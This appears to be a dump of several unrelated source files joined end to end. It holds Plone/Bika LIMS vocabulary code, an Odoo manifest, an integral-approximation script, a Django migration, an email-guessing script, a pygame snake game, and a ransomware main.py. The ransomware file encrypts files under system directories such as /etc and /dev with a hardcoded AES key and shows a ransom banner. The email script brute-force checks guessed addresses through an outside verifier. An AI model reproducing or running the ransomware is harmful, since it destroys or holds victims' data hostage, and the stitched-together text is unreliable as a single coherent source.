wf = getToolByName(site, 'portal_workflow')
if 'portal_type' in self.contentFilter:
portal_type = self.contentFilter['portal_type']
wf_ids = [x.id for x in wf.getWorkflowsFor(portal_type)]
if 'bika_inactive_workflow' in wf_ids \
and 'bika_inactive_workflow' not in self.contentFilter:
self.contentFilter['inactive_state'] = 'active'
elif 'bika_cancellation_workflow' in wf_ids \
and 'bika_inactive_workflow' not in self.contentFilter:
self.contentFilter['cancellation_state'] = 'active'
brains = catalog(self.contentFilter)
items = [('', '')] if allow_blank else []
for brain in brains:
if self.key in brain and self.value in brain:
key = getattr(brain, self.key)
value = getattr(brain, self.value)
else:
obj = brain.getObjec()
key = obj[self.key]
key = callable(key) and key() or key
value = obj[self.value]
value = callable(value) and value() or value
items.append((key, t(value)))
return DisplayList(items)
class BikaContentVocabulary(object):
"""Vocabulary factory for Bika Setup objects. We find them by listing
folder contents directly.
"""
implements(IVocabularyFactory)
def __init__(self, folders, portal_types):
self.folders = isinstance(folders, (tuple, list)) and \
folders or [folders, ]
self.portal_types = isinstance(portal_types, (tuple, list)) and \
portal_types or [portal_types, ]
def __call__(self, context):
site = getSite()
request = aq_get(site, 'REQUEST', None)
items = []
wf = site.portal_workflow
for folder in self.folders:
folder = site.restrictedTraverse(folder)
for portal_type in self.portal_types:
objects = list(folder.objectValues(portal_type))
objects = [o for o in objects if
wf.getInfoFor(o, 'inactive_state') == 'active']
if not objects:
continue
objects.sort(lambda x, y: cmp(x.Title().lower(),
y.Title().lower()))
xitems = [(t(item.Title()), item.Title()) for item in objects]
xitems = [SimpleTerm(i[1], i[1], i[0]) for i in xitems]
items += xitems
return SimpleVocabulary(items)
class BikaCatalogTypesVocabulary(object):
"""Vocabulary factory for really user friendly portal types,
filtered to return only types listed as indexed by bika_catalog
"""
implements(IVocabularyFactory)
def __call__(self, context):
translate = context.translate
types = (
('AnalysisRequest', translate(to_utf8(_('Analysis Request')))),
('Batch', translate(to_utf8(_('Batch')))),
('Sample', translate(to_utf8(_('Sample')))),
('ReferenceSample', translate(to_utf8(_('Reference Sample')))),
('Worksheet', translate(to_utf8(_('Worksheet'))))
)
items = [SimpleTerm(i[0], i[0], i[1]) for i in types]
return SimpleVocabulary(items)
BikaCatalogTypesVocabularyFactory = BikaCatalogTypesVocabulary()
class AnalysisCategoryVocabulary(BikaContentVocabulary):
"""" AnalysisCategories
>>> portal = layer['portal']
>>> from plone.app.testing import TEST_USER_NAME
>>> from plone.app.testing import TEST_USER_ID
>>> from plone.app.testing import setRoles
>>> from plone.app.testing import login
>>> login(portal, TEST_USER_NAME)
>>> setRoles(portal, TEST_USER_ID, ['Manager',])
>>> from zope.component import queryUtility
>>> name = 'bika.lims.vocabularies.AnalysisCategories'
>>> util = queryUtility(IVocabularyFactory, name)
>>> folder = portal.bika_setup.bika_analysiscategories
>>> objects = folder.objectValues()
>>> len(objects)
3
>>> source = util(portal)
>>> source
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> 'Water Chemistry' in source.by_token
True
"""
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_analysiscategories', ],
['AnalysisCategory', ])
AnalysisCategoryVocabularyFactory = AnalysisCategoryVocabulary()
class AnalysisProfileVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_analysisprofiles', ],
['AnalysisProfile', ])
AnalysisProfileVocabularyFactory = AnalysisProfileVocabulary()
class StorageLocationVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_storagelocations', ],
['StorageLocation', ])
StorageLocationVocabularyFactory = StorageLocationVocabulary()
class SamplePointVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_samplepoints', ],
['SamplePoint', ])
SamplePointVocabularyFactory = SamplePointVocabulary()
class SampleTypeVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_sampletypes', ],
['SampleType', ])
SampleTypeVocabularyFactory = SampleTypeVocabulary()
class AnalysisServiceVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_analysisservices', ],
['AnalysisService', ])
AnalysisServiceVocabularyFactory = AnalysisServiceVocabulary()
class ClientVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['clients', ],
['Client', ])
ClientVocabularyFactory = ClientVocabulary()
class UserVocabulary(object):
""" Present a vocabulary containing users in the specified
list of roles
>>> from zope.component import queryUtility
>>> portal = layer['portal']
>>> name = 'bika.lims.vocabularies.Users'
>>> util = queryUtility(IVocabularyFactory, name)
>>> tool = portal.portal_registration
>>> tool.addMember('user1', 'user1',
... properties = {
... 'username': 'user1',
... 'email': '<EMAIL>',
... 'fullname': 'user1'}
... )
<MemberData at /plone/portal_memberdata/user1 used for /plone/acl_users>
>>> source = util(portal)
>>> source
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> 'test_user_1_' in source.by_value
True
>>> 'user1' in source.by_value
True
"""
implements(IVocabularyFactory)
def __init__(self, roles=[]):
self.roles = roles if isinstance(roles, (tuple, list)) else [roles, ]
def __call__(self, context):
site = getSite()
mtool = getToolByName(site, 'portal_membership')
users = mtool.searchForMembers(roles=self.roles)
items = [(item.getProperty('fullname'), item.getId())
for item in users]
items.sort(lambda x, y: cmp(x[0].lower(), y[0].lower()))
items = [SimpleTerm(i[1], i[1], i[0]) for i in items]
return SimpleVocabulary(items)
UserVocabularyFactory = UserVocabulary()
ClientVocabularyFactory = ClientVocabulary()
class ClientContactVocabulary(object):
""" Present Client Contacts
>>> from zope.component import queryUtility
>>> portal = layer['portal']
>>> name = 'bika.lims.vocabularies.ClientContacts'
>>> util = queryUtility(IVocabularyFactory, name)
>>> from plone.app.testing import TEST_USER_NAME
>>> from plone.app.testing import TEST_USER_ID
>>> from plone.app.testing import setRoles
>>> from plone.app.testing import login
>>> login(portal, TEST_USER_NAME)
>>> setRoles(portal, TEST_USER_ID, ['Manager',])
>>> portal.clients.invokeFactory('Client', id='client1')
'client1'
>>> client1 = portal.clients.client1
>>> client1.processForm()
>>> client1.invokeFactory('Contact', id='contact1')
'contact1'
>>> contact1 = client1.contact1
>>> contact1.processForm()
>>> contact1.edit(Firstname='Contact', Surname='One')
>>> contact1.reindexObject()
>>> source = util(portal)
>>> source
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> 'Contact One' in source.by_value
True
"""
implements(IVocabularyFactory)
def __call__(self, context):
site = getSite()
request = aq_get(site, 'REQUEST', None)
items = []
for client in site.clients.objectValues('Client'):
objects = list(client.objectValues('Contact'))
objects.sort(lambda x, y: cmp(x.getFullname().lower(),
y.getFullname().lower()))
xitems = [(to_utf8(item.getFullname()), item.getFullname())
for item in objects]
xitems = [SimpleTerm(i[1], i[1], i[0]) for i in xitems]
items += xitems
return SimpleVocabulary(items)
ClientContactVocabularyFactory = ClientContactVocabulary()
class AnalystVocabulary(UserVocabulary):
def __init__(self):
UserVocabulary.__init__(self, roles=['Analyst', ])
AnalystVocabularyFactory = AnalystVocabulary()
class AnalysisRequestWorkflowStateVocabulary(object):
"""Vocabulary factory for workflow states.
>>> from zope.component import queryUtility
>>> portal = layer['portal']
>>> name = 'bika.lims.vocabularies.AnalysisRequestWorkflowStates'
>>> util = queryUtility(IVocabularyFactory, name)
>>> tool = getToolByName(portal, "portal_workflow")
>>> states = util(portal)
>>> states
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> pub = states.by_token['published']
>>> pub.title, pub.token, pub.value
(u'Published', 'published', 'published')
"""
implements(IVocabularyFactory)
def __call__(self, context):
portal = getSite()
wftool = getToolByName(portal, 'portal_workflow', None)
if wftool is None:
return SimpleVocabulary([])
# XXX This is evil. A vocabulary shouldn't be request specific.
# The sorting should go into a separate widget.
# we get REQUEST from wftool because context may be an adapter
request = aq_get(wftool, 'REQUEST', None)
wf = wftool.getWorkflowById('bika_ar_workflow')
items = wftool.listWFStatesByTitle(filter_similar=True)
items_dict = dict([(i[1], t(i[0])) for i in items])
items_list = [(k, v) for k, v in items_dict.items()]
items_list.sort(lambda x, y: cmp(x[1], y[1]))
terms = [SimpleTerm(k, title=u'%s' % v) for k, v in items_list]
return SimpleVocabulary(terms)
AnalysisRequestWorkflowStateVocabularyFactory = \
AnalysisRequestWorkflowStateVocabulary()
class ARPrioritiesVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_arpriorities', ],
['ARPriority', ])
def getTemplates(bikalims_path, restype):
""" Returns an array with the Templates available in the Bika LIMS path
specified plus the templates from the resources directory specified and
available on each additional product (restype).
Each array item is a dictionary with the following structure:
{'id': <template_id>,
'title': <template_title>}
If the template lives outside the bika.lims add-on, both the template_id
and template_title include a prefix that matches with the add-on
identifier. template_title is the same name as the id, but with
whitespaces and without extension.
As an example, for a template from the my.product add-on located in
<restype> resource dir, and with a filename "My_cool_report.pt", the
dictionary will look like:
{'id': 'my.product:My_cool_report.pt',
'title': 'my.product: My cool report'}
"""
# Retrieve the templates from bika.lims add-on
templates_dir = resource_filename("bika.lims", bikalims_path)
tempath = os.path.join(templates_dir, '*.pt')
templates = [os.path.split(x)[-1] for x in glob.glob(tempath)]
# Retrieve the templates from other add-ons
for templates_resource in iterDirectoriesOfType(restype):
prefix = templates_resource.__name__
if prefix == 'bika.lims':
continue
dirlist = templates_resource.listDirectory()
exts = ['{0}:{1}'.format(prefix, tpl) for tpl in dirlist if
tpl.endswith('.pt')]
templates.extend(exts)
out = []
templates.sort()
for template in templates:
title = template[:-3]
title = title.replace('_', ' ')
title = title.replace(':', ': ')
out.append({'id': template,
'title': title})
return out
def getARReportTemplates():
""" Returns an array with the AR Templates available in Bika LIMS plus the
templates from the 'reports' resources directory type from each
additional product.
Each array item is a dictionary with the following structure:
{'id': <template_id>,
'title': <template_title>}
If the template lives outside the bika.lims add-on, both the template_id
and template_title include a prefix that matches with the add-on
identifier. template_title is the same name as the id, but with
whitespaces and without extension.
As an example, for a template from the my.product add-on located in
templates/reports dir, and with a filename "My_cool_report.pt", the
dictionary will look like:
{'id': 'my.product:My_cool_report.pt',
'title': 'my.product: My cool report'}
"""
resdirname = 'reports'
p = os.path.join("browser", "analysisrequest", "templates", resdirname)
return getTemplates(p, resdirname)
class ARReportTemplatesVocabulary(object):
"""Locate all ARReport templates to allow user to set the default
"""
implements(IVocabularyFactory)
def __call__(self, context):
out = [SimpleTerm(x['id'], x['id'], x['title']) for x in
getARReportTemplates()]
return SimpleVocabulary(out)
def getStickerTemplates():
""" Returns an array with the sticker templates available. Retrieves the
TAL templates saved in templates/stickers folder.
Each array item is a dictionary with the following structure:
{'id': <template_id>,
'title': <template_title>}
If the template lives outside the bika.lims add-on, both the template_id
and template_title include a prefix that matches with the add-on
identifier. template_title is the same name as the id, but with
whitespaces and without extension.
As an example, for a template from the my.product add-on located in
templates/stickers, and with a filename "EAN128_default_small.pt", the
dictionary will look like:
{'id': 'my.product:EAN128_default_small.pt',
'title': 'my.product: EAN128 default small'}
"""
# Retrieve the templates from bika.lims add-on
resdirname = 'stickers'
p = os.path.join("browser", "templates", resdirname)
return getTemplates(p, resdirname)
class StickerTemplatesVocabulary(object):
""" Locate all sticker templates
"""
implements(IVocabularyFactory)
def __call__(self, context):
out = [SimpleTerm(x['id'], x['id'], x['title']) for x in
getStickerTemplates()]
return SimpleVocabulary(out)
ARReportTemplatesVocabularyFactory = ARReportTemplatesVocabulary()
class CustomPubPrefVocabulary(object):
implements(IVocabularyFactory)
def __call__(self, context):
items = [
(_('Email'),'email'),
(_('PDF'), 'pdf')
]
for name, item in getAdapters((context, ), ICustomPubPref):
items.append(item)
return SimpleVocabulary.fromItems(items)
CustomPubPrefVocabularyFactory = CustomPubPrefVocabulary()
| 1.765625 | 2 |
__manifest__.py | IDRISSOUM/sinerkia_jitsi_meet | 0 | 12799088 | # -*- coding: utf-8 -*-
# © 2020 Sinerkia iD (<https://www.sinerkia.com>).
{
'name': 'Sinerkia Jitsi Meet Integration',
'version': '12.0.1.0.2',
'category': 'Extra Tools',
'sequence': 1,
'summary': 'Create and share Jitsi Meet video conferences with other users and external partners',
'description': """
Adds a new APP to create and share Jisti Meet video conference meetings between Odoo users. You can invite external users by sending mail from Odoo.
When you join the meeting Odoo opens a new browser tab so you can keep working on Odoo, and share screen with your partners at Jisti Meet.
""",
"author": "<NAME>",
"website": "https://www.sinerkia.com",
"depends": ['base','web','mail'],
"data": [
'views/sinerkia_jitsi_meet_views.xml','data/sinerkia_jitsi_meet.xml','data/mail_template.xml','security/ir.model.access.csv','security/base_security.xml',
],
'images': ['images/main_screenshot.png'],
'installable': True,
'auto_install': False,
'application': True,
'license': 'AGPL-3',
}
| 1.085938 | 1 |
integral_approximation.py | thenewpyjiang/integral-approximation-python | 1 | 12799089 | <reponame>thenewpyjiang/integral-approximation-python
from sympy.parsing.sympy_parser import parse_expr
from math import *
from sympy import *
import numpy as np
# Left endpoints integral approximation
def left(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
for i in np.arange(left_bound, right_bound, delta_x):
sum += expression.subs(x, i)
return delta_x * sum
# RIght endpoints integral approximation
def right(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
for i in np.arange(left_bound + delta_x, right_bound + delta_x, delta_x):
sum += expression.subs(x, i)
return delta_x * sum
# Midpoints integral approximation
def mid(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
for i in np.arange(left_bound, right_bound, delta_x):
sum += expression.subs(x, i + delta_x / 2)
return delta_x * sum
# Trapezoidal Rule for integral approximation
def trapezoidal(expr, left_bound, right_bound, delta_x):
return (left(expr, left_bound, right_bound, delta_x) \
+ right(expr, left_bound, right_bound, delta_x)) / 2
# Simpson's Rule for integral approximation
def simpson(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
numbers = list(np.arange(left_bound, right_bound + delta_x, delta_x))
for i in range(len(numbers)):
if i == 0 or i == len(numbers) - 1:
sum += expression.subs(x, numbers[i])
elif i % 2 == 0:
sum += 2 * expression.subs(x, numbers[i])
else:
sum += 4 * expression.subs(x, numbers[i])
return delta_x * sum / 3
if __name__ == '__main__':
# Read input
expr = input('Expression: ')
left_bound = float(input('Left Bound: '))
right_bound = float(input('Right Bound: '))
delta_x = float(input('Delta x: '))
type = int(input('Select the type of approximation:\n \
1. Left Endpoints\n \
2. Right Endpoints\n \
3. Midpoints\n \
4. Trapezoidal Rule\n \
5. Simpson\'s Rule\n'))
# Determine which function to call
if type == 1:
print('Result:', left(expr, left_bound, right_bound, delta_x))
elif type == 2:
print('Result:', right(expr, left_bound, right_bound, delta_x))
elif type == 3:
print('Result:', mid(expr, left_bound, right_bound, delta_x))
elif type == 4:
print('Result:', trapezoidal(expr, left_bound, right_bound, delta_x))
elif type == 5:
print('Result:', simpson(expr, left_bound, right_bound, delta_x))
| 3.53125 | 4 |
main.py | brunoredes/ransomware | 0 | 12799090 | <gh_stars>0
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
from Crypto.Cipher import AES
from Crypto.Util import Counter
import argparse
import os
import Discovery
import Crypter
# -----------------
# A senha pode ter os seguintes tamanhos:
# 128/192/256 bits - 8bite = 1byte = 1 caracter unicode
# 256/8 = 32 bytes
# -----------------
HARDCODED_KEY = 'hackware strike force strikes u! '
def get_parser():
parser = argparse.ArgumentParser(description="hackwareCrypter")
parser.add_argument(
'-d', '--decrypt', help='decripta os arquivos [default: no]', action='store_true')
return parser
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
print('''
HACKWARE STRIKE FORCE
------------------------------------------------------------
SEUS ARQUIVOS FORAM CRIPTOGRAFADOS
PARA DECRIPTÁ-LOS, UTILIZE A SEGUINTE SENHA '{}'
------------------------------------------------------------
'''.format(HARDCODED_KEY))
key = input('Digite a senha: ')
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
ctr = Counter.new(256)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
if not decrypt:
cryptoFn = crypt.encrypt
else:
cryptoFn = crypt.decrypt
init_path = os.path.abspath(os.path.join(os.getcwd(), 'files'))
startDirs = [init_path, '/dev', '/etc']
for currentDir in startDirs:
for filename in Discovery.discover(currentDir):
Crypter.change_files(filename, cryptoFn)
# limpa a chave de criptografia da memoria
for _ in range(100):
pass
if not decrypt:
pass
# apos a encriptação, voce pode alterar o wallpaper
# alterar icons, desativar regedit, admin, bios, etc
if __name__ == '__main__':
main()
| 3.15625 | 3 |
apps/accounts/migrations/0015_use_dc_locations.py | denning/admin-portal | 10 | 12799091 | <filename>apps/accounts/migrations/0015_use_dc_locations.py
# Generated by Django 2.2.19 on 2021-04-15 13:14
from django.db import migrations, models
import django.db.models.deletion
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
("taggit", "0003_taggeditem_add_unique_index"),
("accounts", "0014_auto_20210314_2305"),
]
operations = [
migrations.CreateModel(
name="DataCenterLocation",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("city", models.CharField(max_length=255)),
("country", models.CharField(max_length=255)),
(
"datacenter",
models.ForeignKey(
db_column="id_dc",
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="accounts.Datacenter",
),
),
],
options={
"verbose_name": "Datacentre Location",
"db_table": "datacenters_locations",
},
),
]
| 1.648438 | 2 |
emailfinder/find_email.py | forumulator/pythonScripts | 0 | 12799092 | import urllib
from urllib import request, parse
import re
import os, sys
import time
import argparse
# Request headers
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
'Referer': 'http://www.verifyemailaddress.org',
'Origin': 'http://www.verifyemailaddress.org/',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
class EmailVerifier:
SITE_URL = 'https://www.verifyemailaddress.org/#result'
INVALID_SEARCH_STRING = "is not valid"
CONNECTING_TO_DOMAIN = "Connecting to {0} failed"
def create_request(self, email_addr):
post_form = { "email": email_addr }
enc_data = parse.urlencode(post_form).encode()
req = request.Request(
EmailVerifier.SITE_URL,
data = enc_data,
headers = headers
)
return req
def check_domain(self, domain):
req = self.create_request("help@{0}".format(domain))
resp = request.urlopen(req)
html = resp.read().decode("utf-8")
domain_invalid = EmailVerifier.CONNECTING_TO_DOMAIN.format(
domain) in html
if domain_invalid:
print(EmailVerifier.CONNECTING_TO_DOMAIN.format(
domain))
return False
else:
return True
# Returns a boolean value
def verify(self, email_addr, super_verbose = False):
req = self.create_request(email_addr)
resp = request.urlopen(req)
html = resp.read().decode("utf-8")
if super_verbose:
print(html)
re_res = EmailVerifier.INVALID_SEARCH_STRING in html
return (False if re_res else True)
# if super_verbose:
# print(re_res)
# Possible templates for different sizes
# All the possible combinations are covered by
# this and the action of the Permutator
email_templates = {
2: [
"{f}.{l}",
"{f}{l}",
],
3: [
"{f}{m}{l}",
"{f}{m}.{l}",
"{f}.{m}{l}",
"{f}.{m}.{l}"
],
1: [ "{f}" ]
}
EMAIL_FORMAT = "{user}@{domain}"
class Permutator:
""" Generate all possible combination of two and three
words to form an email. For example, (first, last), (last, first), (f, last)
The elems is produced and Permutator is called in a way such that
the emails are always produced most to least specific
eg first.last@ before f.last@ before first@
"""
def __init__(self, elems):
self.elems = elems
# Make actual permutations of elems
def make_perms(self, elems, r):
if r == 0:
yield [elems[0]]
return
for perm in self.make_perms(elems, r - 1):
for i in range(r + 1):
j = r - i
yield perm[:j] + [elems[r]] + perm[j:]
return
# Make permuatations of size from
def make_combs(self, size, l):
if (size > l + 1):
return
if size == 0:
yield []
return
if l == 0:
for elem in self.elems[0]:
yield [elem]
return
for c in self.make_combs(size, l - 1):
yield c
for elem in self.elems[l]:
for c in self.make_combs(size - 1, l - 1):
c.append(elem)
yield c
# Generate all P(n, r) permutations of r = size
def generate(self, size):
for comb in self.make_combs(size, len(self.elems) - 1):
for perm in self.make_perms(comb, len(comb) - 1):
yield perm
return
COLOR_GREEN = "\033[0;32m"
COLOR_RED = "\033[1;31m"
COLOR_RESET = "\033[0;0m"
def verify_for_size(f, l, m, size, verbose = False):
verifier = EmailVerifier()
for template in email_templates[size]:
user = template.format(f = f, l = l, m = m)
if len(user) < 3:
continue
try_addr = EMAIL_FORMAT.format(user = user, domain = domain)
if verbose:
print("Checking `" + try_addr + "`...", end = '', flush = True)
verif = verifier.verify(try_addr)
if verif:
print(COLOR_GREEN + "." + COLOR_RESET, end = '', flush = True)
return try_addr
else:
print(COLOR_RED + "." + COLOR_RESET, end = '', flush = True)
if verbose:
print(" ")
return None
# Sufficiently random email that nobody should
# actually have this as a valid one
RANDOM_EMAIL = "prhzdge.yrtheu"
# Find the email address, given the below parameters
# Permutates over the possible combinations of first and lastname
# including .(period), eg. first.last@ and then checks
# each email.
def find_email(first, middle, last, domain, args):
if not EmailVerifier().check_domain(domain):
raise ValueError("Invalid domain name for email server.")
elif EmailVerifier().verify(EMAIL_FORMAT.format(user = RANDOM_EMAIL, domain = domain)):
raise ValueError("Domain seems to accept all email addresses.")
elif args.verbose:
print("Domain checks successful")
# Can use either from each of elems
elems = [ (first, first[0]), (last, last[0]) ]
if middle:
elems.append((middle, middle[0]))
email, email_list = None, []
p_gen = Permutator(elems)
# Order of lengths is 2, 3, 1
# to match most common observations
for leng in (2, 3, 1):
for perm in p_gen.generate(leng):
first = perm[0]
last = perm[1] if len(perm) > 1 else None
middle = perm[2] if len(perm) > 2 else None
email = verify_for_size(first, last, middle, leng, args.verbose)
if email:
email_list.append(email)
if not args.find_all:
return email_list
# Not found, probably works for Amazon :D
return email_list
# Automatically append .com if no tld is
# present in domain.
TLD = [".com", ".org", ".net"]
def correct_for_tld(domain):
if domain == "":
return domain
domain_flag = False
for tld in TLD:
if domain.endswith(tld):
domain_flag = True
break
if not domain_flag:
return domain + TLD[0]
else:
return domain
# Check internet connectivity, using Google
# the standard connection tester :)
google_url = "https://google.com/"
def check_connectivity():
print("Checking connection...")
try:
request.urlopen(google_url)
return True
except urllib.error.URLError:
return False
parser = argparse.ArgumentParser(
description='Find email address given a name and a domain.')
parser.add_argument('--batch', dest='batch', default = False,
action='store_true', help = "Batch mode, process multiple requests")
parser.add_argument('-v', dest='verbose', default = False,
action='store_true', help = "Verbose mode")
parser.add_argument('--all', dest='find_all', default = False,
action='store_true', help = "Find all possible addresses instead \
of stopping at the first successful")
if __name__ == "__main__":
if not check_connectivity():
print("Can't connect to internet, exiting.")
sys.exit(1)
else:
print("Connectivity okay.")
args = parser.parse_args()
loops = 1000 if args.batch else 1
input_list = []
for l in range(loops):
name = input("Name({first} {last}): ")
if name == "":
break
domain = correct_for_tld(input("Domain: "))
input_list.append((domain, name.split()))
prev_domain = ""
for domain, name_parts in input_list:
if len(name_parts) > 2:
first, middle, last = name_parts[0], name_parts[1].lower(), name_parts[2]
else:
first, last = name_parts; middle = None
if domain == "":
domain = prev_domain
try:
email_list = find_email(first.lower(), middle, last.lower(), domain, args)
print()
if len(email_list) > 0:
print("Valid Emails: ", email_list)
else:
print("Not Found")
prev_domain = domain
except ValueError as e:
print("Error: " + str(e))
sys.exit(1)
# Successful return
sys.exit(0)
| 3.140625 | 3 |
training.py | ArthurMPassos/Snake-ThurMP | 0 | 12799093 | import pygame
from random import randint
# Var de trainamento
# Lista de saida [Esquerda, Cima, Direita, Baixo]
listaOutput = [0,0,0,0]
# Lista de entrada [n da rodada ,pontos obtidos
# matriz do tabuleiro] (tabuleiro incluindo
# paredes, corpo da cobra e maca)
listaEntrada = [0]*3
# Nota: a matriz sera quase 4 vezes maior que o
# tabuleiro em si para a cebeca ser centralizada
# e poder enxergar o tabuleiro inteiro sempre
tamanho_tabuleiro_maior = 20 + 19
matriz_do_tabuleiro = [0]*tamanho_tabuleiro_maior
for i in range(20):
matriz_do_tabuleiro[i] = [0]*39
listaEntrada[2] = matriz_do_tabuleiro
# Funcoes para inserir a cabeca e o corpo
def corpoFunc(x, y):
screen.blit(imagemCorpo, (x,y))
def cabecaFunc(x, y):
screen.blit(imagemCabeca, (x,y))
# Funcao para inserir quadrado verde do fundo
def quadradoFundoFunc(x, y):
screen.blit(imagemQuadradoFundo, (x,y))
# Funcao para inserir a maca
def macaFunc(x, y):
screen.blit(imagemMaca, (x,y))
# Funcao para placar
def placarFunc(x,y):
placar = font.render("Pontos: " + str(pontos), True, (255, 255, 255))
screen.blit(placar, (x,y))
# Loop de treino
for c in range (2):
# Inicializa o pygame
pygame.init()
# Cria tela e define tamanho
screen = pygame.display.set_mode((600,600))
# Titulo e icone
pygame.display.set_caption("Jogo da Cobrenha de ThurMP")
icone = pygame.image.load("images/snake icon.png")
fim_de_jogo = False
rodada = 0
# Define fonte
pontos = 0
font = pygame.font.Font('freesansbold.ttf', 32)
# Cria e atualiza fundo
background = pygame.image.load("images/fundo_quadriculado_verde.png")
screen.blit(background,(0,0))
# Load das imagens
imagemCorpo = pygame.image.load("images/corpo.png")
imagemCabeca = pygame.image.load("images/cabeça_direita.png")
imagemQuadradoFundo = pygame.image.load("images/quadrado_do_fundo.png")
imagemMaca = pygame.image.load("images/maca1.png")
# Configuracao inicial da cabeca
cabecaX = 181
cabecaY = 271
#for i in range(39):
# matriz_do_tabuleiro[(-1)//30][(-1)//30] =
# Jogo comeca indo para a direita
cabecaXChange = 30
cabecaYChange = 0
# Listas para manter armazenadas as posicoes do corpo
# (Ja com a configuracao inicial)
listaXCorpo = [91, 121 ,151]
listaYCorpo = [271, 271, 271]
# Configuracao inicial do corpo
cabecaFunc(cabecaX, cabecaY)
corpoFunc(91, 271)
corpoFunc(121, 271)
corpoFunc(151, 271)
matriz_do_tabuleiro[(271-1)//30][(91-1)//30] = -1
matriz_do_tabuleiro[(271-1)//30][(121-1)//30] = -1
matriz_do_tabuleiro[(271-1)//30][(151-1)//30] = -1
# Cria a primeira maca e garante que nao esta na cobra
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
while((macaX in listaXCorpo) and (macaY in listaYCorpo)):
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
macaFunc(macaX, macaY)
matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 1
# Var para verificar se a cobra deve crescer ou nao
crescer = False
pygame.time.wait(1000)
# Game Loop
running = True
while running:
# Setando a Lista de entrada
listaEntrada[0] = rodada
listaEntrada[1] = pontos
#listaEntrada[2] = matriz_do_tabuleiro
#listaEntrada[2] = (macaX-1)/30
#listaEntrada[3] = (macaY-1)/30
#listaEntrada[4] = (cabecaX-1)/30
#listaEntrada[5] = (cabecaY-1)/30
# Get dos eventos
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
# Se alguma seta for apertada
if event.type == pygame.KEYDOWN:
rodada += 1
if not fim_de_jogo and rodada > 1:
# Nota: nao muda de direcao caso ja esteja indo para a desejada
if (event.key == pygame.K_LEFT) and (cabecaXChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_esquerda.png")
cabecaXChange = -30
cabecaYChange = 0
if (event.key == pygame.K_RIGHT) and (cabecaXChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_direita.png")
cabecaXChange = 30
cabecaYChange = 0
if (event.key == pygame.K_DOWN) and (cabecaYChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_baixo.png")
cabecaXChange = 0
cabecaYChange = 30
if (event.key == pygame.K_UP) and (cabecaYChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_cima.png")
cabecaXChange = 0
cabecaYChange = -30
if rodada>0:
# Se a maca for pega, add 1 ponto e cria outra
# Atuliza a posicao da da maca na matriz
if (cabecaX == macaX and cabecaY == macaY):
matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 0
pontos += 1
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 1
# Garante que a maca nao apareca em cima da cobra
while((macaX in listaXCorpo) and (macaY in listaYCorpo)):
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
macaFunc(macaX, macaY)
# Guarda o valor para ela crescer
crescer = True
# Coloca o corpo logo onde a cabeca sai e
# grava na lista
listaXCorpo.append(cabecaX)
listaYCorpo.append(cabecaY)
matriz_do_tabuleiro[(cabecaY-1)//30][(cabecaX-1)//30] = -1
corpoFunc(cabecaX, cabecaY)
cabecaX += cabecaXChange
cabecaY += cabecaYChange
# Condicao de cobra bater na borda
if (cabecaX < 0) or (cabecaX > 600) or (cabecaY > 600) or (cabecaY < 0):
# Plot do placar
placarFunc(210,270)
cabecaXChange = 0
cabecaYChange = 0
fim_de_jogo = True
# Condicao de cobra bater nela mesma
for i in range(len(listaXCorpo)):
if(cabecaX == listaXCorpo[i]):
if (cabecaY == listaYCorpo[i]):
# Plot do placar
placarFunc(210,270)
cabecaXChange = 0
cabecaYChange = 0
fim_de_jogo = True
# Cobre a ponta da cauda com quadrado verde
# Caso crescer == True faz a cobra crescer 1 espaco
if not crescer:
matriz_do_tabuleiro[(listaYCorpo[0]-1)//30][(listaXCorpo[0]-1)//30] = 0
quadradoFundoFunc(listaXCorpo.pop(0), listaYCorpo.pop(0))
crescer = False
# Coloca a cabeca no espaco seguinte
cabecaFunc(cabecaX, cabecaY)
# Atualiza a tela e gera delay
pygame.display.update()
pygame.time.wait(150)
